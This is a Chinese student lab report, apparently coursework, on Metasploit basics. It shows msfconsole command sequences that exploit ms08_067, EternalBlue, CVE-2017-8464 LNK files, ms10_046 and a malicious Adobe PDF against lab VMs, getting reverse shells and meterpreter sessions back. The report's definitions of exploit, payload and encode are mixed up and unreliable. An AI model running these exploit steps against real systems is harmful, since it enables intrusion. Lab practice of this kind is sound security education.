1.实验内容

1.0Armitage初体验

kali端输入 armitage 启动armitage

发现开启失败,更根据提示先输入 /etc/init.d/postgresql start ,打开postgresql服务再进入armitage

更改端口为学号4309,其他选项默认不变

进入界面发现没有可以攻击的主机

选择上方菜单栏hosts-nmap scan-quick scan(os detect)进行扫描

对虚拟机所在的网段进行扫描

选中靶机,右键选择services,查看可以利用的端口

右键选择scan进行扫描

选择上方菜单栏attacks-findattacks

可以进行攻击了!

对win7端攻击失败后,我增添了一台xp sp3继续进行实验;

选中目标主机右键attack-smb-ms08_067_netapi

在攻击win7失败后,我下载了一个xp进行实验,攻击仍然失败,猜测应该是与xp系统的中英文版本有关,中文盗版猖獗,每次有新补丁盗版方还会贴心地给用户打上。。。

重新下载一个windows2003 server sp2,进行相关攻击

2003端仍然失败,重新在windows 2000 sp4上实验还是失败,也许不是系统版本与相关补丁的问题,可能是kali上的armitage配置出现了一些问题,暂时排除不了具体原因,还是用老办法msfconsole继续实验吧。

1.1三个主动攻击实践+成功应用任何一个辅助模块+唯一

1.1.1 ms08_067_netapi

攻击端:kali 2019 192.168.236.131

靶机:win 2000 sp4 192.168.236.143

输入 msfconsole

输入 search ms08_067 ,查找可用的exploit

输入 use exploit/windows/smb/ms08_067_netapi

输入 show payloads  对可使用的payload进行查找,这里我使用generic/shell_reverse_tcp

输入 set payload generic/shell_reverse_tcp

配置攻击源地址源端口与目的地址

set RHOST 192.168.236.143
set LPORT 4309
set LHOST 192.168.236.131 

输入 show options 查看具体信息

输入 exploit 进行渗透攻击

攻击成功

1.1.2 ms17_010_eternalblue+ auxiliary辅助模块扫描

攻击端:kali-linux-2019.1-amd64 ip:192.168.236.131

靶机:Win 7 旗舰版 ip:192.168.236.128

还是没有死心,打算再次使用armitage实验。

选中靶机,在armitage左侧目录中选择exploit-windows-smb-ms_010_eternalblue

看似是攻击成功了,但是在连接sessions与调用meterpreter shell是出现了问题,看来应该是我kali中armitage工具不够完善。还是乖乖滚回去用msf吧。

进入msfconsole

输入 search ms17 type: auxiliary platform:windows 查找永恒之蓝的auxiliary辅助模块扫描指令

输入 use auxiliary/scanner/smb/smb_ms17_010

输入 set RHOSTS 192.168.239.129 设置目标地址

输入 run 进行扫描

能够建立连接,开始正式攻击

use exploit/windows/smb/ms17_010_eternalblueset payload windows/x64/shell/reverse_tcpset RHOST 192.168.236.128
set LPORT 4309
set LHOST 192.168.236.131show options
exploit

攻击成功。

1.1.3 cve 2017_8464 (震网三代) (唯一)

use exploit/windows/fileformat/cve_2017_8464_lnk_rceset PAYLOAD windows/meterpreter/reverse_tcpset LHOST 192.168.236.131exploit

输入 cp -r /root/.msf4/local/ /root/1 将生成的文件从隐藏文件夹中复制出来

将文件导出至U盘,连接到靶机中。

kali端进行监听:

search multi/handler
use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 192.168.236.131run

在靶机运行U盘中的FlashPlayerCPLAPP.cpl

攻击成功。

1.2 一个针对浏览器的攻击:ms10_046

攻击端:kali-linux-2019.1-amd64 ip:192.168.236.131

靶机:Win xp ps3 ip:192.168.236.134

进入msfconsole

输入 search ms10_046

输入 use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

set payload windows/meterpreter/reverse_httpset RHOST 192.168.236.134
set LPORT 4309
set LHOST 192.168.236.131show options
exploit

靶机连接http://192.168.236.131:80/

输入session -i 1  连接id为1的session获取shell

攻击成功。

1.3 一个针对客户端的攻击adobe_pdf_embedded_exe

攻击端:kali-linux-2019.1-amd64 ip:192.168.236.131

靶机:Win xp ps3 ip:192.168.236.134

进入msfconsole

输入 search adobe type:exploit platform:windows 查找可用漏洞,这里我选择了adobe_pdf_embedded_exe

use exploit/windows/fileformat/adobe_pdf_embedded_exe

show payloads

Set payload windows/meterpreter/reverse_tcpset RHOST 192.168.236.134
set RHOST 192.168.236.134
set LPORT 4309
set LHOST 192.168.236.131
set FILENAME 20164309.pdf
show options
exploit

生成文件20164309.pdf

使用nc将文件传输到靶机中

ncat.exe -lv 4309 > 20164309.pdf
nc192.168.236.134 4309 < 20164309.pdf

攻击机中进行监听

use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 192.168.236.131
set LPORT 4309exploit

靶机中打开文件,攻击成功。

2.基础问题回答

用自己的话解释什么是exploit,payload,encode.

Exploit:“利用”,通过漏洞来攻击受害者,也就是拉货的马;

Payload:“编码”,去掉“坏字符”,为渗透攻击做准备;改变特征码,起到免杀作用;也就是货车;

Encode:“有效负载”、“shellcode”,能够在受害者环境中进行操作,也就是装货的车厢。

整个攻击过程就是马拉着装满货物的车送往目的地。

3.实践总结体会

3.1总结体会

本次实验是我历时最长的一次实验,也是收获最大的一次实验。包括实验报告的撰写实验五一共花费了我四个晚上的时间,让我深深明白了什么是自学。在实验的开始我打算图方便使用armitage进行自动化攻击,导致我在不停下载与更换虚拟机上浪费了过多的时间,最后还是没有排除无法成功应用armitage。其实我还尝试了WebExec(CVE-2018-15442)与mssql_payload但均以失败告终,这也让我感受到了我能力的不足。

3.2离实战还缺些什么技术或步骤

缺的东西大了去了,以我的水平只是到应用msf工具的水平,还不能详细的阐述攻击的原理;并且meterpreter库中更新不及时,很多漏洞都及时被windows官方发现与修复,实战性不强;同时像payload的编写、encode的设计我们都没有能力实现,导致攻击方法单一,水准不够高。

转载于:https://www.cnblogs.com/20164309-kx/p/10699118.html

Exp5 MSF基础应用 20164309 欧阳彧骁相关推荐

  1. Exp1 PC平台逆向破解 20164309 欧阳彧骁

    一.实践目标 本次实践的对象是一个名为pwn1的linux可执行文件. 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串. 该程序同时包含另一个代码片段,getS ...

  2. 2018-2019 20165237网络对抗 Exp5 MSF基础应用

    2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...

  3. 20155227《网络对抗》Exp5 MSF基础应用

    20155227<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:把实现设置好的东西送到要攻击的主机里. ...

  4. 20155210 Exp5 MSF基础应用

    Exp5 MSF基础应用 一个主动攻击实践,MS08-067 首先利用msfconsole启用msf终端 然后利用search MS08-067搜索漏洞,会显示相应漏洞模块 如图: 根据上图,我们输入 ...

  5. 20155216 Exp5 MSF基础应用

    Exp5 MSF基础应用 基础问题回答 1.用自己的话解释什么是exploit,payload,encode? exploit : Exploit的英文意思就是利用,在做攻击时,通常称为漏洞利用. 一 ...

  6. 2018-2019-2 20165212《网络攻防技术》Exp5 MSF基础应用

    2018-2019-2 20165212<网络攻防技术>Exp5 MSF基础应用 攻击成果 主动攻击的实践 ms17010eternalblue payload windows/x64/m ...

  7. 2018-2019-2 网络对抗技术 20162329 Exp5 MSF基础应用

    目录 Exp5 MSF基础应用 一.基础问题回答 二.攻击系统 ms08_067攻击(成功) 三.攻击浏览器 ms11_050_mshtml_cobjectelement(Win7失败) 手机浏览器攻 ...

  8. 《网络对抗》Exp5 MSF基础应用

    20155336<网络对抗>Exp5 MSF基础应用 一.基础知识回答 用自己的话解释什么是exploit,payload,encode exploit:渗透攻击的模块合集,将真正要负责攻 ...

  9. 20155220 Exp5 MSF基础应用

    Exp5 MSF基础应用 一个主动攻击实践,MS08-067 首先利用msfconsole启用msf终端 然后利用search MS08-067搜索漏洞,会显示相应漏洞模块 根据上图,我们输入use ...

最新文章

  1. Activity创建
  2. QCon 2015 阅读笔记 - 团队建设
  3. 10行代码理解Java锁消除
  4. python 乘法运算定律_计算机组成原理(上)资料
  5. SpringAOP拦截Controller,Service实现日志管理(自定义注解的方式)
  6. python xlwt模块生成excel文件并写入数据 xlrd读取数据
  7. 随笔记录(2019.7.10)
  8. 苹果手机内存怎么查_为什么苹果手机内存越用越小
  9. [.NET] 怎样使用 async await 一步步将同步代码转换为异步编程
  10. git bash here 找不到应用程序_git 简单命令
  11. JMeter Exception: java.net.BindException: Address already in use: connect(转)
  12. python工资一般多少-Python就业都有哪些岗位?每个岗位薪资多少?
  13. v9更新系统后为何显示服务器连接,红伞V9升级不能……报告里说好多文件无法与服务器建立连接……...
  14. pyinstaller编译出的exe被杀毒软件认为是木马
  15. L19.linux命令每日一练 -- 第三章 文件过滤及内容编辑处理命令 -- tailf和cut命令
  16. 创建型模式之简单工厂模式
  17. 杀死一只知更鸟的方法教会了我如何成为一名混乱大师
  18. gyb的常用lazyCopy
  19. 魅族mx4 android5.0,第一手更新 魅族MX4Pro安卓5.0抢先体验
  20. apache ii评分怎么评_如何正确进行APACHE II评分

热门文章

  1. android开发期间使用真机调试但系统无法识别出真机
  2. android IntentService
  3. mysql 命令行导入sql脚本
  4. 7-55 空心字母金字塔 (10 分)
  5. java方面的文献综述怎么写_如何写文献综述?
  6. Linux内核地址空间为什么1GB,为什么Windows为其系统地址空间预留1Gb(或2 Gb)?
  7. php gdk,gdk.php
  8. innobackupex 数据库备份
  9. 获取一组radio按钮选中的值Value
  10. 【旧文章搬运】Windows内核常见数据结构(线程相关)